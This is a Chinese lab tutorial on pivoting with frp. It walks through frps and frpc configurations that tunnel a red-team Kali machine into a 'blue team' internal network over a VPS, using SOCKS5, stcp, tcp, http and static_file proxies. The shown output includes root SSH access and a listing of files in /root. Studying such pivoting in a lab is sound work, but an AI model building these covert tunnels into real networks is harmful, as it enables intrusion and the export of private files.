跳板攻击之:frp代理转发
跳板攻击之:frp代理转发
1 frp 介绍
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
2 frp 原理
frp 主要由 客户端(frpc) 和 服务端(frps) 组成:服务端通常部署在具有公网 IP 的机器上,客户端通常部署在需要穿透的内网服务所在的机器上。
内网服务由于没有公网 IP,不能被非局域网内的其他用户访问。
用户通过访问服务端的 frps,由 frp 负责根据请求的端口或其他信息将请求路由到对应的内网机器,从而实现通信。
frp 支持的代理类型。
类型 描述 tcp 单纯的 TCP 端口映射,服务端会根据不同的端口路由到不同的内网服务。 udp 单纯的 UDP 端口映射,服务端会根据不同的端口路由到不同的内网服务。 http 针对 HTTP 应用定制了一些额外的功能,例如修改 Host Header,增加鉴权。 https 针对 HTTPS 应用定制了一些额外的功能。 stcp 安全的 TCP 内网代理,需要在被访问者和访问者的机器上都部署 frpc,不需要在服务端暴露端口。 sudp 安全的 UDP 内网代理,需要在被访问者和访问者的机器上都部署 frpc,不需要在服务端暴露端口。 xtcp 点对点内网穿透代理,功能同 stcp,但是流量不需要经过服务器中转。 tcpmux 支持服务端 TCP 端口的多路复用,通过同一个端口访问不同的内网服务。
3 实验环境
3.1 实验准备
- 添加 A 记录 <your_vps_ domain> 指向 VPS IP
- CentOS2主机开放了22与80端口与服务
3.2 实验拓扑

4 frp代理socks
实现:kali通过frp socks代理,访问蓝队内网2 CentOS2 的 ssh 服务。
VPS 上
frps.ini配置:[common]
bind_port = 2333 token = Admin123
# frp管理后台端口,请按自己需求更改
dashboard_port = 7500
# frp管理后台用户名和密码,请改成自己的
dashboard_user = admin
dashboard_pwd = Aadmin@123
enable_prometheus = true # frp日志配置
log_file = /var/log/frp/frps.log
log_level = info
log_max_days = 3 # 执行:
./frps -c frps.ini
蓝队内网1 CentOS 配置
frpc.ini:[common]
server_addr = <your_vps_IP>
server_port = 2333
token = Admin123 [plugin_socks]
type = tcp
remote_port = 32123
plugin = socks5
plugin_user = fcarey
plugin_passwd = Aadmin@123
use_encryption = true
use_compression = true # 执行:
./frpc -c frpc.ini
kali配置
/etc/proxychains4.conf:socks5 <your_vps_IP> 32123 fcarey Aadmin@123
- 代理服务器IP为:VPS 的 IP
kali通过frp socks代理,访问蓝队内网2 CentOS2 的 ssh 服务。

5 frp代理stcp安全地暴露内网服务
实现:kali通过frp stcp代理,创建一个只有自己能访问到蓝队内网2 CentOS2 的 SSH 服务代理。
注:使用
stcp(secret tcp)类型的代理可以避免让任何人都能访问到要穿透的服务,但是kali也需要运行另外一个 frpc 客户端。VPS 上
frps.ini配置:[common]
bind_port = 2333 token = Admin123
# frp管理后台端口,请按自己需求更改
dashboard_port = 7500
# frp管理后台用户名和密码,请改成自己的
dashboard_user = admin
dashboard_pwd = Aadmin@123
enable_prometheus = true # frp日志配置
log_file = /var/log/frp/frps.log
log_level = info
log_max_days = 3 # 执行:
./frps -c frps.ini
蓝队内网2 CentOS2 配置
frpc.ini[common]
server_addr = <your_vps_IP>
server_port = 2333
token = Admin123 [secret_ssh]
type = stcp
# 只有 sk 一致的用户才能访问到此服务
sk = Admin@123
local_ip = 10.1.1.8
local_port = 22 # 执行:
./frpc -c frpc.ini
- 如果想访问
CentOS上的web服务器(80端口),只需注释local_ip或将local_ip改为127.0.0.1
- 如果想访问
红队内网 kali 配置
frpc.ini[common]
server_addr = <your_vps_IP>
server_port = 2333
token = Admin123 [secret_ssh_visitor]
type = stcp
# stcp 的访问者
role = visitor
# 要访问的 stcp 代理的名字
server_name = secret_ssh
sk = Admin@123
# 绑定本地端口用于访问 SSH 服务
bind_addr = 127.0.0.1
bind_port = 2222 # 执行:
./frpc -c frpc.ini
kali通过frp stcp代理,访问到蓝队内网2 CentOS2 的 SSH 服务。

6 frp代理tcp
实现:kali通过frp tcp代理,访问蓝队内网2 CentOS2 的 ssh 服务。
VPS 上
frps.ini配置:[common]
bind_port = 2333 token = Admin123
# frp管理后台端口,请按自己需求更改
dashboard_port = 7500
# frp管理后台用户名和密码,请改成自己的
dashboard_user = admin
dashboard_pwd = Aadmin@123
enable_prometheus = true # frp日志配置
log_file = /var/log/frp/frps.log
log_level = info
log_max_days = 3 # 执行:
./frps -c frps.ini
蓝队内网2 CentOS2 配置
frpc.ini[common]
server_addr = <your_vps_IP>
server_port = 2333
token = Admin123 [ssh]
type = tcp
local_ip = 10.1.1.8
local_port = 22
remote_port = 2222 # 执行:
./frpc -c frpc.ini
- 如果想访问
CentOS上的web服务器(80端口),只需注释local_ip或将local_ip改为127.0.0.1
- 如果想访问
kali通过frp tcp代理,访问蓝队内网2 CentOS2 的 ssh 服务。
# ssh root@<your_vps_IP> -p2222
The authenticity of host '[<your_vps_IP>]:2222 ([<your_vps_IP>]:2222)' can't be established.
ED25519 key fingerprint is SHA256:AtSBORnurK5vcdkDVyo0aC96JolXOmpM7AoeYem/6WU.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
~/.ssh/known_hosts:3: [hashed name]
~/.ssh/known_hosts:4: [hashed name]
~/.ssh/known_hosts:5: [hashed name]
~/.ssh/known_hosts:6: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[<your_vps_IP>]:2222' (ED25519) to the list of known hosts.
root@<your_vps_IP>'s password:
Last login: Sun Aug 21 15:52:26 2022 from 10.1.1.7
[root@fcarey ~]# whoami
root
7 frp代理通过自定义域名访问内网的 Web 服务
实现:kali通过frp代理http,使用
http://<your_vps_ domain>:8888,访问蓝队内网2 CentOS2上的 WEB 服务器(80端口)。VPS 上
frps.ini配置:[common]
bind_port = 2333
vhost_http_port = 8888 token = Admin123
# frp管理后台端口,请按自己需求更改
dashboard_port = 7500
# frp管理后台用户名和密码,请改成自己的
dashboard_user = admin
dashboard_pwd = Aadmin@123
enable_prometheus = true # frp日志配置
log_file = /var/log/frp/frps.log
log_level = info
log_max_days = 3 # 执行:
./frps -c frps.ini
蓝队内网2
CentOS2配置frpc.ini[common]
server_addr = <your_vps_IP>
server_port = 2333
token = Admin123 [web]
type = http
local_ip = 10.1.1.8
local_port = 80
custom_domains = acdns.fcarey.com # 执行:
./frpc -c frpc.ini
- 如果想访问
CentOS上的web服务器(80端口),只需注释local_ip或将local_ip改为127.0.0.1
- 如果想访问
kali通过
http://<your_vps_ domain>:8888,访问蓝队内网2 CentOS2上的 WEB 服务器(80端口)。# curl http://acdns.fcarey.com:8888
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /</title>
<body>
<h2>Directory listing for /</h2>
<hr>
<ul>
<li><a href="1.png">1.png</a>
<li><a href="2.png">2.png</a>
<li><a href="build/">build/</a>
8 frp代理static_file对外提供简单的文件访问服务
实现:kali通过frp代理static_file,下载蓝队内网1 CentOS上文档。
VPS 上
frps.ini配置:[common]
bind_port = 2333 token = Admin123
# frp管理后台端口,请按自己需求更改
dashboard_port = 7500
# frp管理后台用户名和密码,请改成自己的
dashboard_user = admin
dashboard_pwd = Aadmin@123
enable_prometheus = true # frp日志配置
log_file = /var/log/frp/frps.log
log_level = info
log_max_days = 3 # 执行:
./frps -c frps.ini
蓝队内网1
CentOS配置frpc.ini[common]
server_addr = <your_vps_IP>
server_port = 2333
token = Admin123 [static_file]
type = tcp
remote_port = 2121
plugin = static_file
# 要对外暴露的文件目录
plugin_local_path = /root
# 用户访问 URL 中会被去除的前缀,保留的内容即为要访问的文件路径
plugin_strip_prefix = static
plugin_http_user = fcarey
plugin_http_passwd = Aadmin@123 # 执行:
./frpc -c frpc.ini
kali通过frp代理static_file,通过浏览器访问
http://<your_vps_IP>:2121/download/来查看位于/root目录下的文件,会要求输入已设置好的用户名和密码。└─# curl --basic -u fcarey:Aadmin@123 http://<your_vps_IP>:2121/download/
<pre>
<a href=".bash_history">.bash_history</a>
<a href=".bash_logout">.bash_logout</a>
<a href=".bash_profile">.bash_profile</a>
<a href=".bashrc">.bashrc</a>
<a href=".cache/">.cache/</a>
<a href=".cshrc">.cshrc</a>
<a href=".pki/">.pki/</a>
9 frp代理xtcp
实现:kali通过frp xtcp代理,创建一个只有自己能访问到蓝队内网2 CentOS2 的 SSH 服务代理。
注:
- frp 提供了一种新的代理类型
xtcp用于应对在希望传输大量数据且流量不经过服务器的场景,使用方式同stcp类似,kali也需要运行另外一个 frpc 客户端。 - xtcp目前处于开发的初级阶段,并不能穿透所有类型的 NAT 设备,所以穿透成功率较低。穿透失败时可以尝试
stcp的方式。 - 本次实验没有成功。
- frp 提供了一种新的代理类型
VPS 上
frps.ini配置:[common]
bind_port = 2333
bind_udp_port = 2333 token = Admin123
# frp管理后台端口,请按自己需求更改
dashboard_port = 7500
# frp管理后台用户名和密码,请改成自己的
dashboard_user = admin
dashboard_pwd = Aadmin@123
enable_prometheus = true # frp日志配置
log_file = /var/log/frp/frps.log
log_level = info
log_max_days = 3 # 执行:
./frps -c frps.ini
蓝队内网2 CentOS2 配置
frpc.ini[common]
server_addr = <your_vps_IP>
server_port = 2333
token = Admin123 [p2p_ssh]
type = xtcp
# 只有 sk 一致的用户才能访问到此服务
sk = Admin@123
local_ip = 10.1.1.8
local_port = 22 # 执行:
./frpc -c frpc.ini
- 如果想访问
CentOS上的web服务器(80端口),只需注释local_ip或将local_ip改为127.0.0.1
- 如果想访问
红队内网 kali 配置
frpc.ini[common]
server_addr = <your_vps_IP>
server_port = 2333
token = Admin123 [p2p_ssh_visitor]
type = xtcp
# xtcp 的访问者
role = visitor
# 要访问的 xtcp 代理的名字
server_name = p2p_ssh
sk = Admin@123
# 绑定本地端口用于访问 ssh 服务
bind_addr = 127.0.0.1
bind_port = 2222 # 执行:
./frpc -c frpc.ini
kali通过frp stcp代理,访问到蓝队内网2 CentOS2 的 SSH 服务。
失败。
10 高级功能
跳板攻击之:frp代理转发的更多相关文章
- FRP代理及其在数据库安全上的实践
1 代理 现如今的互联网世界里,代理服务已经十分常见,它通常作为一个第三方或者说中转站角色替代用户取得信息或者服务. 根据代理对象的不同,代理服务可以分为正向代理和反向代理. 1.1 正向代理 我们通 ...
- ssh代理转发
实验环境 serverA:172.16.2.116 serverB:172.16.2.225 serverC:172.16.2.115 "代理转发"是针对ssh认证过程的一种转发 ...
- curl运行json串,代理转发格式
curl -b 'uin=o0450654733; skey=@tq9xjRvYy' -H "Content-Type: application/json" -X POST -d ...
- windows下使用密钥登录Linux及xshell代理转发
1.密钥登录原理 一般我们使用xshell访问远程主机(Linux主机)时,都是先请管理员给我们开一个账户,即为我们设置一个一个用户名和对应的密码,然后我们就可以使用下面的方式登录到远程主机了: 在这 ...
- IIS充当代理转发请求到Kestrel
接着上篇博文为ASP.NetCore程序启用SSL的code,这篇将介绍如何用IIS充当反向代理的角色转发请求到Kestrel服务器 与ASP.NET不同,ASP.netCore使用的是自托管web服 ...
- Nginx代理转发Apache+svn
1.安装svn和httpd yum install httpd yum install subversion mod_dav_svn 创建仓库目录 mkdir -p /var/www/svn 3.创建 ...
- nginx反向代理转发后页面上的js css文件无法加载【原创】
故障现象:nginx做代理转发后,发现页面上的js css文件无法加载,页面样式乱了. 原因:没有配置静态资源 解决js css文件无法加载无法访问的问题 解决办法: 修改配置文件nginx.conf ...
- Docker Kubernetes hostPort 代理转发
Docker Kubernetes hostPort 代理转发 hostPort: 1. 类似docker -p 映射宿主级端口到容器. 2. 容器所在的主机暴露端口转发到指定容器中. 3. hos ...
- IIS充当反向代理转发请求到Kestrel
接着上篇博文为ASP.NetCore程序启用SSL的code,这篇将介绍如何用IIS充当反向代理的角色转发请求到Kestrel服务器 介绍 与ASP.NET不同,ASP.netCore使用的是自托管w ...
- iis和apache共用80端口,IIS代理转发apache
为什么共用80端口应该不用多说了,服务器上程序运行环境有很多套,都想抢用80端口,所以就有了共用80端口的解决方案. 网上很多的教程一般都是设置APACHE使用默认80端口,代理转发IIS的网站,II ...
随机推荐
- 教你用JavaScript完成轮播图
案例介绍 欢迎来到我的小院,我是霍大侠,恭喜你今天又要进步一点点了!我们来用JavaScript编程实战案例,做一个轮播图.图片每3秒自动轮换,也可以点击左右按键轮播图片,当图片到达最左端或最右端时, ...
- 什么是NineData?突然就火了
NineData 是集成了 SQL 开发.数据复制.数据备份.数据对比多个模块的云服务,支持混合云(自建库+云数据库的业务架构)和多云(多个不同云厂商数据库组成的业务架构)架构下的企业数据管理,大幅降 ...
- 浅谈 Java 和 Python 的反射
反射这个词我一直没搞懂,也不知道为什么需要反射,也不知道反射到底做了什么.所见所闻逐渐丰富之后,开始有点儿懂了. 先不管反射这个词是什么意思.Java 里面有反射,Python 里面也有反射,但是不太 ...
- cesium加载倾斜摄影,添加billboard并注册点击事件
完整示例代码如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset=" ...
- Flutter异常监控 - 肆 | Rollbar源码赏析
一. Rollbar可以帮你解决哪些问题 无特别说明,文中Rollbar统指Rollbar-flutter 1. 代码复用 Rollbar官方文档说是纯Dart实现,该特征意味着自带"代码复 ...
- python进阶之路11 闭包函数 装饰器
函数名的多种用法 函数名其实绑定的也是一块内存地址 只不过该地址里面存放的不是数据值而是一段代码 函数名加括号就会找到该代码并执行 1.可以当作变量名赋值 def index():pass res = ...
- 如何用 30s 给面试官讲清楚什么是 Token?
引言 前文介绍了 Session-Cookie 的认证过程,简单回顾下基本步骤: 客户端(浏览器)向服务器发送用户名和密码 服务器验证通过后,创建 Session 对象,在 Session 中保存该用 ...
- 题解P4474 王者之剑
双倍经验 简要题意 给你一个 \(n\times m\) 的网格,数字在格子里,你需要取出一些格子,使得任意两个格子之间没有公共边,输出格子中的数字和的最大值. \(1 \le n,m \le 100 ...
- linux 基础之输入输出重定向
输入输出重定向 输出重定向 正确命令 > 文件 (覆盖) 正确命令 >> 文件(追加) 错误命令 2> 文件(覆盖) 错误命令 2>>文件(追加) 命令> 文 ...
- vue3+quasar+capacitor开发多平台项目,使用quasar改变主题背景
quasar的样式和其他的框架修改不太一样,需要我们使用动态的方式来进行变更,一般来说有两种方案进行主题修改 方案一: 修改样式所需文档: 这里是样式修改的说明:https://quasar.dev/ ...